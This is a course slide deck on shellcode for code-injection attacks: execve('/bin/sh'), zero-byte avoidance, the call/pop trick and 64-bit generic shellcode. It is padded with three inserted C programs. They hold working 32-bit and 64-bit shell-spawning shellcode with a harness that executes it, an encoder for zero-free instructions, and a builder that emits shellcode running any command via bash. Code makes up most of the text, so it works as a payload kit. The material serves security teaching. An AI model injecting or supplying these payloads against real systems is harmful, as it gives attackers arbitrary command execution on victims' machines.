S09_Shellcode

The document discusses the challenges of writing shellcode, which is often used in code injection attacks to gain shell access for executing arbitrary commands. It outlines two approaches for creating shellcode in both 32-bit and 64-bit formats, detailing the assembly programming techniques and methods to avoid zeros in the code. Additionally, it covers data preparation and compilation/testing processes for effective shellcode execution.

Uploaded by

Nayla Greige

Shellcode

Outline
• Challenges in writing shellcode
• Two approaches
• 32-bit and 64-bit Shellcode
Introduction
• In code injection attack: need to inject binary code
• Shellcode is a common choice
• Its goal: get a shell
– After that, we can run arbitrary commands
• Written using assembly code
Writing a Simple Assembly Program
• Invoke exit()

• Compilation (32-bit)

• Linking to generate final binary


THE BASIC IDEA
Writing Shellcode Using C
Getting the Binary Code
Writing Shellcode Using Assembly
• Invoking execve(“/bin/sh”, argv, 0)
– eax = 0x0b: execve() system call number
– ebx = address of the command string “/bin/sh”
– ecx = address of the argument array argv
– edx = address of environment variables (set to 0)
• Cannot have zero in the code, why?
– Shellcode is usually injected through string functions such as strcpy(), which stop copying at the first 0x00 byte, so any zero byte truncates the code
Setting ebx
Setting ecx
Setting edx
• Setting edx = 0

xor edx, edx


Invoking execve()
• Let eax = 0x0000000b
Putting Everything Together
Compilation and Testing
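The shellcode of this first approach, written out as an added example (not code from the slides): both the 32-bit and the 64-bit execve("/bin//sh") variants with the assembly as comments, a check that neither contains a 0x00 byte (so a string copy would carry it whole), and a small harness that copies the bytes into memory and jumps to them. The slides test with strcpy() into a stack buffer and an executable stack; this harness instead makes a static page executable with mprotect() so no special link flag is needed. The file name sc.c is an assumption.

```c
/* Added example, not from the slides: execve("/bin//sh") shellcode of the
 * first approach (string pushed onto the stack), a zero-byte check and a
 * run harness. "//" pads "/bin//sh" to exactly 8 bytes.
 * Build (hypothetical file name sc.c):
 *   gcc sc.c -o sc          64-bit version runs
 *   gcc -m32 sc.c -o sc32   32-bit version runs */
#include <stdio.h>
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>

/* 32-bit: execve("/bin//sh", {"/bin//sh", NULL}, NULL); eax = 0x0b; int 0x80 */
const unsigned char sc32[] =
    "\x31\xc0"                  /* xor  eax, eax   ; eax = 0 without a 0 byte    */
    "\x50"                      /* push eax        ; string terminator           */
    "\x68\x2f\x2f\x73\x68"      /* push "//sh"                                   */
    "\x68\x2f\x62\x69\x6e"      /* push "/bin"     ; "/bin//sh\0" now on stack   */
    "\x89\xe3"                  /* mov  ebx, esp   ; ebx = address of the string */
    "\x50"                      /* push eax        ; argv[1] = NULL              */
    "\x53"                      /* push ebx        ; argv[0] = address of string */
    "\x89\xe1"                  /* mov  ecx, esp   ; ecx = argv                  */
    "\x31\xd2"                  /* xor  edx, edx   ; edx = NULL (no envp)        */
    "\xb0\x0b"                  /* mov  al, 0x0b   ; one-byte operand, no zeros  */
    "\xcd\x80";                 /* int  0x80                                     */

/* 64-bit: same idea; rax = 59 (execve), args in rdi/rsi/rdx; syscall */
const unsigned char sc64[] =
    "\x48\x31\xd2"              /* xor  rdx, rdx   ; envp = NULL                 */
    "\x52"                      /* push rdx        ; string terminator           */
    "\x48\xb8" "/bin//sh"       /* mov  rax, "/bin//sh" (8 bytes, no zero)       */
    "\x50"                      /* push rax        ; "/bin//sh\0" now on stack   */
    "\x48\x89\xe7"              /* mov  rdi, rsp   ; rdi = address of the string */
    "\x52"                      /* push rdx        ; argv[1] = NULL              */
    "\x57"                      /* push rdi        ; argv[0] = address of string */
    "\x48\x89\xe6"              /* mov  rsi, rsp   ; rsi = argv                  */
    "\x48\x31\xc0"              /* xor  rax, rax                                 */
    "\xb0\x3b"                  /* mov  al, 59     ; execve on x86-64            */
    "\x0f\x05";                 /* syscall                                       */

/* Index of the first 0x00 byte in the code, or -1 if there is none. */
int first_zero(const unsigned char *code, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0) return (int)i;
    return -1;
}

/* 1 if a C string copy (strcpy-style) would carry the whole code, 0 otherwise. */
int survives_strcpy(const unsigned char *code, size_t len) {
    return strlen((const char *)code) == len;
}

/* Page-aligned static buffer that we turn into an executable region. */
static unsigned char __attribute__((aligned(4096))) page[4096];

/* Copy the code into the page, make it executable and jump to it.
 * Does not return when execve succeeds (the shell replaces this process). */
int run_shellcode(const unsigned char *code, size_t len) {
    if (len > sizeof page) return -1;
    memcpy(page, code, len);
    if (mprotect(page, sizeof page, PROT_READ | PROT_WRITE | PROT_EXEC) != 0) {
        perror("mprotect");
        return -1;
    }
    ((void (*)(void))(void *)page)();
    return -1;                          /* only reached if execve failed */
}

int main(void) {
#if defined(__x86_64__)
    const unsigned char *code = sc64; size_t len = sizeof(sc64) - 1;
#elif defined(__i386__)
    const unsigned char *code = sc32; size_t len = sizeof(sc32) - 1;
#else
#  error "x86 only"
#endif
    printf("%zu bytes, first zero byte at %d (-1 = none)\n", len, first_zero(code, len));
    return run_shellcode(code, len);
}
```

Run it and you land in a shell; `first_zero()` is the check to repeat every time the assembly is changed, since a single 0x00 byte is enough to make a strcpy()-based injection silently drop the tail of the code.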
GETTING RID OF ZEROS FROM SHELLCODE
How to Avoid Zeros
• Using xor
– “mov eax, 0”: not good, the machine code (b8 00 00 00 00) contains zeros
– “xor eax, eax”: no zero in the machine code (31 c0)
• Using instruction with one-byte operand
– How to save 0x00000099 to eax?
– “mov eax, 0x99”: not good, 0x99 is encoded as the 32-bit immediate 0x00000099 (b8 99 00 00 00)
– “xor eax, eax; mov al, 0x99”: al is the lowest byte of eax, and the immediate is a single byte (b0 99)
Using Shift Operator
• How to assign 0x00112233 to ebx? (“mov ebx, 0x00112233” has a zero byte)
– Load a value with no zero byte, e.g. 0x112233ff, then shift right by 8 bits: “mov ebx, 0x112233ff; shr ebx, 8”
Pushing the “/bin/bash” String Into Stack
• Without using the “//” padding technique (“/bin/bash” is 9 bytes, not a multiple of 4, so the last chunk cannot be pushed as a full 4-byte word)
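The three tricks above (xor, one-byte operand, shift) turned into a small zero-free encoder, as an added example that is not part of the slides: `encode_load_ebx()` emits 32-bit x86 machine code that loads a constant into ebx, picking the technique by where the zero bytes of the constant are, and a minimal interpreter for those five instruction forms checks that the emitted bytes really produce the intended value. Constants whose low bytes are zero (e.g. 0x1200) are not handled by these three rules and are reported as failures; that limitation is deliberate. The function names are the example's own.

```c
/* Added example, not from the slides: zero-free loads of a 32-bit constant
 * into ebx, using the techniques from the "How to Avoid Zeros" slides. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

static int has_zero_byte(const uint8_t *p, size_t n) {
    for (size_t i = 0; i < n; i++) if (p[i] == 0) return 1;
    return 0;
}

/* Writes the encoding into out (16 bytes is enough). Returns its length,
 * or -1 if these rules cannot produce a zero-free encoding for v. */
int encode_load_ebx(uint32_t v, uint8_t *out) {
    size_t n = 0;
    if (v == 0) {                               /* xor ebx, ebx */
        out[n++] = 0x31; out[n++] = 0xdb;
    } else if (v <= 0xff) {                     /* xor ebx, ebx ; mov bl, imm8 */
        out[n++] = 0x31; out[n++] = 0xdb;
        out[n++] = 0xb3; out[n++] = (uint8_t)v;
    } else if (v <= 0xffff) {                   /* xor ebx, ebx ; mov bx, imm16 */
        out[n++] = 0x31; out[n++] = 0xdb;
        out[n++] = 0x66; out[n++] = 0xbb;
        out[n++] = (uint8_t)v; out[n++] = (uint8_t)(v >> 8);
    } else if ((v >> 24) == 0) {                /* mov ebx, (v << 8) | 0xff ; shr ebx, 8 */
        uint32_t padded = (v << 8) | 0xff;
        out[n++] = 0xbb;
        for (int i = 0; i < 4; i++) out[n++] = (uint8_t)(padded >> (8 * i));
        out[n++] = 0xc1; out[n++] = 0xeb; out[n++] = 0x08;
    } else {                                    /* mov ebx, imm32 (already zero-free) */
        out[n++] = 0xbb;
        for (int i = 0; i < 4; i++) out[n++] = (uint8_t)(v >> (8 * i));
    }
    return has_zero_byte(out, n) ? -1 : (int)n;
}

/* Interpreter for exactly the instruction forms emitted above; returns the
 * final ebx so an encoding can be checked without an assembler. */
uint32_t eval_load_ebx(const uint8_t *c, int len) {
    uint32_t ebx = 0xdeadbeef;                  /* garbage, as at shellcode entry */
    for (int i = 0; i < len;) {
        if (c[i] == 0x31 && c[i + 1] == 0xdb) { ebx = 0; i += 2; }
        else if (c[i] == 0xb3) { ebx = (ebx & 0xffffff00u) | c[i + 1]; i += 2; }
        else if (c[i] == 0x66 && c[i + 1] == 0xbb) {
            ebx = (ebx & 0xffff0000u) | c[i + 2] | ((uint32_t)c[i + 3] << 8); i += 4;
        } else if (c[i] == 0xbb) {
            ebx = c[i + 1] | ((uint32_t)c[i + 2] << 8) |
                  ((uint32_t)c[i + 3] << 16) | ((uint32_t)c[i + 4] << 24); i += 5;
        } else if (c[i] == 0xc1 && c[i + 1] == 0xeb) { ebx >>= c[i + 2]; i += 3; }
        else return 0xffffffffu;                /* not one of our forms */
    }
    return ebx;
}

/* 1 if v encodes zero-free and the bytes evaluate back to v. */
int roundtrip(uint32_t v) {
    uint8_t buf[16];
    int len = encode_load_ebx(v, buf);
    return len > 0 && eval_load_ebx(buf, len) == v;
}

/* 1 if the encoding of v is exactly the n bytes in expected. */
int encoding_equals(uint32_t v, const uint8_t *expected, size_t n) {
    uint8_t buf[16];
    int len = encode_load_ebx(v, buf);
    return len == (int)n && memcmp(buf, expected, n) == 0;
}

int main(void) {
    uint32_t samples[] = {0, 0x99, 0x1234, 0x00112233, 0x11223344, 0x1200};
    for (size_t s = 0; s < sizeof samples / sizeof samples[0]; s++) {
        uint8_t buf[16];
        int len = encode_load_ebx(samples[s], buf);
        printf("0x%08x:", samples[s]);
        if (len < 0) { printf(" no zero-free encoding\n"); continue; }
        for (int i = 0; i < len; i++) printf(" %02x", buf[i]);
        printf("   -> ebx = 0x%08x\n", eval_load_ebx(buf, len));
    }
    return 0;
}
```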
ANOTHER APPROACH
Getting the Addresses of String and ARGV[]
• Trick: place the string and the argv[] data right after a “call” instruction
– “call” pushes its return address (the address of the data that follows it) onto the stack
– the called code does a “pop” to get that address into a register
…. code omitted …
Data Preparation
• Putting a zero at the end of the shell string

• Constructing the argument array


Compilation and Testing
• Error: segmentation fault (code region cannot be modified)
– this approach writes into the data placed right after the code, which sits in the read-only text segment
• Make code region writable
– e.g. link with “ld --omagic” (“-N”), which makes the text segment writable


64-BIT SHELLCODE
64-Bit Shellcode (elf64)
A Generic Shellcode (64-bit)
• Goal: execute arbitrary commands
• Data region: a list of commands


Data Preparation (1)
Data Preparation (2)
Machine Code
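The second approach (call/pop to find a data region, zeros patched in at run time) and the generic 64-bit shellcode of this section, combined into one added example that is not part of the slides: a builder that hand-assembles the x86-64 code, appends the data region “/bin/bash*”, “-c*”, the command, and the four argv placeholders, and computes the jmp/call displacements for whatever command length is given. It only produces bytes; running them requires writable and executable memory, exactly the problem the “code region cannot be modified” slide describes. The helper names and the sample command are the example's own.

```c
/* Added example, not from the slides: builds the 64-bit generic shellcode of
 * the second approach for any command string up to 89 bytes. Layout:
 *   code | "/bin/bash*" | "-c*" | cmd "*" | AAAAAAAA BBBBBBBB CCCCCCCC DDDDDDDD
 * At run time the code replaces each '*' with 0x00, fills A..D with the argv
 * pointers (D becomes NULL) and calls execve("/bin/bash", argv, NULL).
 * The code writes into its own data region, so it must run from memory that
 * is both writable and executable. All encodings are hand-assembled. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SC_MAX 256

static size_t put(uint8_t *b, size_t n, const void *src, size_t len) {
    memcpy(b + n, src, len);
    return n + len;
}
/* mov byte [rbx+disp8], al */
static size_t store_al(uint8_t *b, size_t n, uint8_t disp) {
    uint8_t ins[] = {0x88, 0x43, disp};
    return put(b, n, ins, sizeof ins);
}
/* mov qword [rbx+disp8], reg   (modrm byte selects the source register) */
static size_t store_r64(uint8_t *b, size_t n, uint8_t modrm, uint8_t disp) {
    uint8_t ins[] = {0x48, 0x89, modrm, disp};
    return put(b, n, ins, sizeof ins);
}
/* lea reg, [rbx+disp8]          (modrm byte selects the destination register) */
static size_t lea_rbx(uint8_t *b, size_t n, uint8_t modrm, uint8_t disp) {
    uint8_t ins[] = {0x48, 0x8d, modrm, disp};
    return put(b, n, ins, sizeof ins);
}

/* Returns the total length (code + data) or -1; *code_len gets the code part. */
int build_generic_shellcode(const char *cmd, uint8_t *out, size_t *code_len) {
    size_t L = strlen(cmd);
    if (L > 89) return -1;      /* the last argv slot, at 38 + L, must fit a disp8 */
    /* data offsets relative to rbx, which will point at the start of the data */
    uint8_t off_bash = 0, off_c = 10, off_cmd = 13, off_argv = (uint8_t)(14 + L);
    size_t n = 0, one, two;
    n = put(out, n, "\xeb\x00", 2);                 /* jmp short two (rel8 patched below) */
    one = n;
    n = put(out, n, "\x5b\x48\x31\xc0", 4);         /* one: pop rbx ; xor rax, rax */
    n = store_al(out, n, off_bash + 9);             /* terminate "/bin/bash" */
    n = store_al(out, n, off_c + 2);                /* terminate "-c" */
    n = store_al(out, n, (uint8_t)(off_cmd + L));   /* terminate the command */
    n = store_r64(out, n, 0x5b, off_argv);          /* argv[0] = rbx (= "/bin/bash") */
    n = lea_rbx(out, n, 0x4b, off_c);               /* rcx = &"-c" */
    n = store_r64(out, n, 0x4b, off_argv + 8);      /* argv[1] = rcx */
    n = lea_rbx(out, n, 0x4b, off_cmd);             /* rcx = &cmd */
    n = store_r64(out, n, 0x4b, off_argv + 16);     /* argv[2] = rcx */
    n = store_r64(out, n, 0x43, off_argv + 24);     /* argv[3] = rax = NULL */
    n = put(out, n, "\x48\x89\xdf", 3);             /* mov rdi, rbx        ; filename */
    n = lea_rbx(out, n, 0x73, off_argv);            /* lea rsi, [rbx+argv] ; argv */
    n = put(out, n, "\x48\x31\xd2\xb0\x3b\x0f\x05", 7); /* xor rdx,rdx ; mov al,59 ; syscall */
    two = n;
    out[1] = (uint8_t)(two - 2);                    /* jmp lands on the call */
    int32_t rel = (int32_t)one - (int32_t)(two + 5); /* call one: rel32 from next ip */
    out[n++] = 0xe8;
    memcpy(out + n, &rel, 4);                       /* little-endian, as on x86 */
    n += 4;
    *code_len = n;                                  /* data starts right after the call */
    n = put(out, n, "/bin/bash*-c*", 13);
    n = put(out, n, cmd, L);
    n = put(out, n, "*AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDD", 33);
    for (size_t i = 0; i < *code_len; i++)          /* code part must stay zero-free */
        if (out[i] == 0) return -1;
    return (int)n;
}

/* Convenience for inspecting one byte of the result (-1 on failure / out of range). */
int generic_byte_at(const char *cmd, size_t i) {
    uint8_t sc[SC_MAX]; size_t code_len;
    int total = build_generic_shellcode(cmd, sc, &code_len);
    return (total < 0 || i >= (size_t)total) ? -1 : sc[i];
}

int main(void) {
    uint8_t sc[SC_MAX]; size_t code_len;
    const char *cmd = "/bin/ls -l; echo hello";     /* constructed sample command */
    int total = build_generic_shellcode(cmd, sc, &code_len);
    if (total < 0) { fprintf(stderr, "build failed\n"); return 1; }
    printf("code (%zu bytes):", code_len);
    for (size_t i = 0; i < code_len; i++) printf(" %02x", sc[i]);
    printf("\ndata (%d bytes): %.*s\n", total - (int)code_len,
           total - (int)code_len, (const char *)sc + code_len);
    return 0;
}
```

The data region can be edited freely as long as its length is unchanged, which is why the slides keep the command line at a fixed width; the builder here recomputes every displacement instead, so any command up to the disp8 limit works.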
Summary
• Challenges in writing shellcode
• Two approaches
• 32-bit and 64-bit Shellcode
• A generic shellcode
